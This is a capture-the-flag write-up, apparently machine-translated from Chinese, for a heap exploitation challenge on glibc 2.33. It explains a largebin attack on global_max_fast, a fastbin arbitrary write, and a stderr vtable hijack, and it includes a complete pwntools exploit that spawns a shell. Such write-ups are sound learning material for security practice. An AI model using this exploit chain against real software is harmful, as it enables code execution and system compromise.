[dest0g3 520 orientation] dest0g3, which has been a long time since we got WP_ heap

I haven't done it before , Always trying to figure out , Get WP For a long time , And then it happens step by step , Due to the official WP There are a lot of redundant codes uploaded by the respondents WP So it is very difficult to understand , But I have some time to catch up with the weekend , Repeated trials have finally succeeded .

First, build a topic 5 Block of byte addresses , Then you can modify and release it at will in this block .add Use calloc Don't use tcache,show Is based on buf In the address , Because of all edit All in mmap The block needs to be modified libc Your address will be troublesome .

Used here global_max_fast This value , This value is in the libc Of mallopt In the function , stay libc-2.33 The inner offset is 0x1e3e78

__int64 __fastcall mallopt(unsigned int a1, int a2)
{
......
    case 1u:
      v4 = 0LL;
      if ( (unsigned __int64)a2 <= 0xA0 )
      {
        v4 = a1;
        v7 = (a2 + 8LL) & 0xFFFFFFFFFFFFFFF0LL;
        if ( (unsigned __int64)a2 <= 7 )
          v7 = 16LL;
        qword_1E3E78 = v7;   //global_max_fast
      }
      break;
......
}

This value is fastbin The maximum of , The default is 80, You can also directly libc Search in the readable and writable block of 0x0000000000000080 To get . Increase this value , Building larger blocks will not be released to unsort But directly released to fastbin Modify at this time fd Pointer is a value A, When building blocks again, this value will be A Put it in fastbin Pointer area of （ At this time, due to the modification global_max_fast, The maximum value has exceeded 0x80 So it will cause write overflow , And will be A Write to the location of the specified offset ）. and fastbinY stay main_arena+0x10 The location of , Every time 8 byte 1 Pointer size difference of each block 0x10, Where you want to write, set a block of appropriate size to be released to fastbin, That's the formula .

chunk_size = (where - fastbinY)*2 + 0x10

Then the flow of this problem will be ：

1. Let the cat out of the libc And heap address :
   1. First build a block in the normal heap and then mmap Release a large block into unsortbin, Building the same block will build the block to mmap The position just released in the will buf Set to mmap Block inside
   2. Release the two formed by two large blocks unsort Will become a chain ,fd->main_arena,bk->next unsort After this proper filling （ hold 0 Fill out ） You can get libc And heap address
2. use largbinAttack modify global_max_fast
   1. Because a piece is more complicated , I didn't see it clearly, so I drew a gourd , The principle is slightly .
   2. First release a large block to unsort When building larger blocks , It will be put in largebin
   3. Release another chunk to unsort And amend article 1 individual largegin The pointer to global_max_fast-0x20-3（-3 It is used for dislocation , Only two bytes are written here ）
   4. When you build a large block again, you will global_max_fast-3 Write the address of the newly modified pointer at ( This value is determined by 0x80 Change to one 2 Byte value XXXX） When a larger block is released （ Than this XXXX Small ） Will be released to fastbin, Build the same big block and use this fastbin when fastbin Inside fd The pointer will be written to the corresponding position .
3. modify _IO_2_1_stderr_+0xd8 Of vtable The pointer （ Because the biggest part of the topic is limited , So I can't write _IO_file_jumps, Last question ez_kiwi There is no limit to writing directly _IO_file_jumps+0x60 by system） Let him point to a near fake vtable
4. Amend this fake_vtable+0x60 The location of the for system
5. modify _IO_2_1_stderr_+0 by /bin/sh\0
6. because mmap The block is 5 Byte address , Write ahead global_max_fast Time goes wrong 3 byte , therefore global_max_fast The value of is 2 byte . Build one here 0xffff The block of triggers the execution of an error system(/bin/sh)
7. The background environment is ubuntu 21 When using ubuntu20 and patch To the corresponding libc after ,libc The address will be better than 21 The address in is small 0x1d000.

from pwn import *

'''
patchelf --set-interpreter /home/shi/libc6_2.33-0ubuntu5/lib64/ld-2.33.so pwn
patchelf --add-needed /home/shi/libc6_2.33-0ubuntu5/lib64/libc.so.6 pwn
'''

local = 1
if local == 1:
    p = process('./pwn')
else:
    p = remote('node4.buuoj.cn', 27787) 

#libc_elf = ELF('/home/shi/libc6_2.33-0ubuntu5/lib64/libc.so.6')
libc_elf = ELF('/home/shi/libc/libc6_2.33/lib/x86_64-linux-gnu/libc-2.33.so')
elf = ELF('./pwn')
context.arch = 'amd64'

menu = b'>> '
def add(size):
    p.sendlineafter(menu, b'1')
    p.sendlineafter(b"size: ", str(size).encode())

def edit(offset, msg):
    p.sendlineafter(menu, b'2')
    p.sendlineafter(b"size: ", str(len(msg)).encode())
    p.sendlineafter(b"offset: ", str(offset).encode())
    p.sendafter(b"content: ", msg)

def free(offset):
    p.sendlineafter(menu, b'3')
    p.sendlineafter(b"idx: ", str(offset).encode())

def show():
    p.sendlineafter(menu, b'4')
    p.recvuntil(b"content: ")


add(0x18)

pay1 = flat(0,0x21,0,0, 0, 0x431, b'\x00'*0x428, 0x21,0,0, 0,0x21)
pay2 = flat(0,0x21,0,0, 0, 0x421, b'\x00'*0x418, 0x21,0,0, 0,0x21)
edit(0, pay1)
edit(0x800, pay2)
free(0x30)
add(0x420)  # Give Way buf The value is mmap In the value of the , for show When using 
#0x55cd19605050:	0x0000003a9a3de000	0x0000003a9a3de030  <-- mmap_base+0x30
free(0x30)  # Release two unsort Chain forming , adopt fd,bk obtain libc And heap address 
free(0x830)
#0x3a9a3de030:	0x00007f63a3369c00	0x0000003a9a3de820
#libc_base
edit(0x30, b'A')
show()
main_arena = u64(p.recv(6).ljust(8,b'\x00')) - ord('A') - 0x60
libc_base = main_arena -0x10 - libc_elf.sym['__malloc_hook']
libc_elf.address = libc_base
fastbinY = main_arena + 0x10
global_max_fast = libc_base + 0x1e3e78
print('libc:', hex(libc_base))
print('global_max_fast:', hex(global_max_fast))
print('main_arena:', hex(main_arena))
#mmap_heap_base
edit(0x30, b'A'*8)
show()
p.recvuntil(b'A'*8)
mmap_base = u64(p.recvuntil(b'1. alloc', drop=True).ljust(8, b'\x00')) -0x820
print('mmap:', hex(mmap_base))

edit(0x30, p64(main_arena + 0x60)) # Restore the modified value 

#2, modify flobal_max_fast
add(0x410) #unsort2 
add(0x500) #unsort1->large1 +30
edit(0x1200, pay2)
free(0x1230)
edit(0x30, flat(main_arena+0x50+0x400, main_arena+0x50+0x400, 0, global_max_fast -0x20 -3))
add(0x500)
#gef*  x/20gx 0x1e3e70+0x007fcbdea55000
#0x7fcbdec38e70:	0x2ae2200000000000	0x000000000000a79f

def write_where(where,what):
    chunk_size = (where - fastbinY)*2 + 0x10
    print(hex(where), 'size:', hex(chunk_size), hex(what))
    edit(0x20, flat(0, chunk_size+0x11,0,0,0,0))
    edit(chunk_size+0x10+0x20, flat(0, 0x21,0,0,0, 0x21))
    free(0x30) 
    edit(0x30, p64(what ^ ((mmap_base + 0x30)>>12)))
    add(chunk_size)
    

#3, stderr->vtable=fake+380, +380+60 :system, stderr:/bin/sh
#write_where(libc_elf.sym['_IO_file_jumps'] + 96, libc_elf.sym['system'])
write_where(libc_elf.sym['_IO_2_1_stderr_'] + 0x380 + 0x60 , libc_elf.sym['system'])
write_where(libc_elf.sym['_IO_2_1_stderr_'] + 0xd8, libc_elf.sym['_IO_2_1_stderr_'] + 0x380 )
write_where(libc_elf.sym['_IO_2_1_stderr_'], 0x0068732f6e69622f )
#0x7f2ba5d4d5e0 <_IO_2_1_stderr_>:	0x0068732f6e69622f	 <--- /bin/sh

edit(0x1800, flat(0,0x21,b'\x00'*0x18, 0xc1, b'\x00'*0xb8, 0x21,b'\x00'*0x18, 0x21,b'\x00'*0x18))

for i in range(7):
    free(0x1830)
    edit(0x1830, p64(0)*2)
free(0x1830)
edit(0x1820, flat(0, 0xce))

add(0xffff)

p.interactive()